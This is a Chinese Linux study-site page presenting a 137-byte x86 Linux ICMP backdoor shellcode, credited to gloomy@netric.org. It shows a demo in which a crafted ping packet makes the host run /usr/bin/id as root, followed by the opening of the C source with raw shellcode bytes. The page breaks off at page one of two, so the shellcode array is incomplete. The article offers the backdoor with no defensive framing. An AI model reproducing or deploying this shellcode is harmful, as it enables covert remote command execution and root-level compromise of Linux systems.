首页 > Linux考试认证

导读:介绍的Linux ICMP的后门。那么下面我们就来详细看一下关于137字节的Linux远程ICMP后门的具体内容。
时间:2010-08-27 08:28:51  作者:  我要投稿
Linux初探欢迎您的投稿,投放方法请点击这里查看,我们会定期赠送精美小礼品给优秀的投稿作者。海纳百川 取则行远!LinuxGoo欢迎您的到来。
来源:中国IT实验室2010/8/25【考试大:中国教育考试第一门户】模拟考场视频课程字号:T T导读:介绍的Linux ICMP的后门。那么下面我们就来详细看一下关于137字节的Linu......
来源:中国IT实验室 2010/8/25 【考试大:中国教育考试第一门户】 模拟考场 视频课程 字号:T T 导读:介绍的Linux ICMP的后门。那么下面我们就来详细看一下关于137字节的Linux远程ICMP后门的具体内容。

  编辑特别推荐:

  Linux多网卡同IP段解决

  linux系统日志不自动切分的问题

  linux命令:ifconfig和route

  在不少协议的应用都存在着一些后门。例如我们今天将要介绍的Linux ICMP的后门。那么下面我们就来详细看一下关于137字节的Linux远程ICMP后门的具体内容。使用Ping控制程序:

  /*

  x86 linux icmp bind shellcode (137 bytes) by gloomy@netric.org

  [example]

  main:/home/gloomy/security/shellcode/linux/icmp# ./icmp

  Size of shellcode = 137

  main:/home/gloomy/security/shellcode/linux/icmp# ping -p 992f7573722f62696e2f69643e6f7574 -c 1 -s 26 localhost

  PATTERN: 0x992f7573722f62696e2f69643e6f7574 (\x99/usr/bin/id>out)

  34 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.5 ms

  main:/home/gloomy/security/shellcode/linux/icmp# cat out

  uid=0(root) gid=0(root) groups=0(root)

  main:/home/gloomy/security/shellcode/linux/icmp#

  */

  #include <stdio.h>

  #include <unistd.h>

  #include <sys/socket.h>

  #include <netinet/in.h>

  #define SECRET_CHAR "\x99"

  char shell[] =

  "\x31\xc0\x31\xdb\x31\xc9\xb0\x66"

  "\x43\x41\x51\xb1\x03\x51\x49\x51"

  "\x89\xe1\xcd\x80\x89\xc2\xb0\x02"

  "\xcd\x80\x31\xdb\x39\xc3\x75\x55"

  "\x31\xc0\x31\xdb\xb0\x10\x50\xb0"

  "\xff\x54\x54\x53\x50\x55\x52\x89"

  "\xe1\xb0\x66\xb3\x0c\xcd\x80\x89"

  "\xe9\x01\xc1\x31\xc0\x88\x41\xfe"

  "\xb0\x25\x01\xc5\xb0" SECRET_CHAR

  "\x32\x45\xff\x75\xd5\xb0\x02\xcd"

 1/2    1 2 下一页 尾页
如果您需转载 导读:介绍的Linux ICMP的后门。那么下面我们就来详细看一下关于137字节的Linux远程ICMP后门的具体内容。,请注明来自LinuxGoo.com,其版权归原作者所有。请广大网友留言时遵纪守法,使用文明用语。如果您在应用中有什么问题,请在下面留言,我们会尽快解答。
来顶一下
近回首页
返回首页
发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表
相关文章
栏目热门
站内搜索: 高级搜索
Powered by Linux初探  © 1999-2009 RSS